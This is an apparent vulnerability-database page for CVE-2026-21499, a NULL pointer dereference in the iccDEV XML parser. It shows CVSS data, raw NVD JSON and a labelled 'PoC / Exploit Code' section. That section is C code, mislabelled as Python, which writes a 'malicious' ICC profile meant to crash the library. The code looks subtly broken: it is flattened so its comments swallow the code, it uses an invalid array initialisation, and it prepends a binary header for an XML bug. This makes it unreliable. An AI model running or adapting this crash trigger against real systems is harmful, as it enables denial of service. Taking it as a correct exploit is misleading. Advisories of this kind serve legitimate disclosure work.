Security Vulnerability Report
中文
CVE-2026-21499 CVSS 5.5 MEDIUM

CVE-2026-21499

Published: 2026-01-07 18:15:54
Last Modified: 2026-01-09 22:00:00
Source: [email protected]

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML parser. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> // Generate malicious ICC profile XML that triggers NULL pointer dereference // This PoC creates a malformed ICC profile that causes the XML parser // to dereference a NULL pointer during profile parsing void generate_malicious_icc_profile(const char* output_file) { FILE* fp = fopen(output_file, "wb"); if (!fp) { printf("Failed to create output file\n"); return; } // ICC profile header unsigned char header[128] = {0}; // Set profile size (will be adjusted) *(unsigned int*)(header + 0) = 0x00000400; // 1024 bytes // Set preferred CMM type *(unsigned int*)(header + 4) = 0x6D6E7472; // 'mntr' // Set profile version *(unsigned int*)(header + 8) = 0x02000000; // Set device class (input device) *(unsigned int*)(header + 12) = 0x7363656E; // 'scen' // Set color space *(unsigned int*)(header + 16) = 0x52574220; // 'RGB ' // Set PCS *(unsigned int*)(header + 20) = 0x58595A20; // 'XYZ ' fwrite(header, 1, 128, fp); // Malformed XML tag that triggers NULL pointer in parser // The parser expects certain XML elements but receives malformed data const char* malicious_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" "<ICCProfile>\n" " <ProfileHeader>\n" " <InvalidElement missing_attr=\"\"/>\n" " </ProfileHeader>\n" "</ICCProfile>\n"; fwrite(malicious_xml, 1, strlen(malicious_xml), fp); // Fill remaining space unsigned char padding[1024 - 128 - strlen(malicious_xml)] = {0}; fwrite(padding, 1, sizeof(padding), fp); fclose(fp); printf("Malicious ICC profile generated: %s\n", output_file); } int main() { generate_malicious_icc_profile("malicious_profile.icc"); printf("To trigger the vulnerability, load this profile using iccDEV library\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21499", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:53.810", "lastModified": "2026-01-09T21:59:59.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML parser. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a la desreferencia de puntero NULL mediante el analizador XML. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-690"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/blob/8e71f0a701abcbd554725ba7b70258203e682a61/IccXML/IccLibXML/IccProfileXml.cpp#L477", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/00c03013e11b35ddbd7caae4368d1add185849d9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/af299895bbcbecca6f67d6dc3d8e1dc92f1fc3fa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/372", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/412", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c3pv-2cpf-7v2p", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.